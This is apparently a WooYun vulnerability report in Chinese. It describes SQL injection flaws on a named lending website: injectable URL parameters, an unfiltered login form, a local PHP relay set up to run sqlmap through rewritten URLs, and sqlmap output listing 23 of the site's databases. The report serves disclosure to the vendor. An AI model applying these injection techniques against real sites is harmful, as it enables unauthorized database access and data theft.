WooYun.org

欢迎新厂商，到处都是SQL注射啊，SSL了就安全吗、NO!
gg找到一个连接，https://www.dingxindai.com/index.php?home&user_id=324
随意加个单引号就报错了，这里我们后面再细说。

主站的登陆框的数据也没有过滤，加个引号什么的报错哗哗的。这个也很重要！！！
其实刚才给出的php才是你们的真实构架格式，但是注射也不好使，https几个工具都吃不消。https://www.dingxindai.com/u/25这样的格式是你们伪静态之后的，那既然是伪静态，就自己来中转一下了注射。
本地搭建php环境，zhongzhuan.php为中转文件。来中转注射。
就中转https://www.dingxindai.com/u/25这个吧。中转后的地址：
http://127.0.0.1/zhongzhuan.php?id=25

然后

这下SQLMAP成功的跑出了数据，东西很多啊。
23个数据库，连论坛的数据库都在一起呢？

available databases [23]:
[*] #mysql50#lost+found
[*] 0228-1
[*] 0228_bak
[*] bak130318
[*] d2222
[*] dxd_0318-02
[*] dxd_0320-02
[*] dxd_0320_01
[*] dxd_1224
[*] dxd_1224_2
[*] dxd_130109
[*] dxd_130109_01
[*] dxd_130109_2
[*] dxd_130109_3
[*] dxd_20130124
[*] dxd_20130124_2
[*] dxd_bak
[*] dxd_bbs
[*] dxd_dyp2p_net
[*] information_schema
[*] mysql
[*] test
[*] www_dingxindai_com_bbs

and so on ....
发现全站基本都没有过滤的，好好自查一下吧。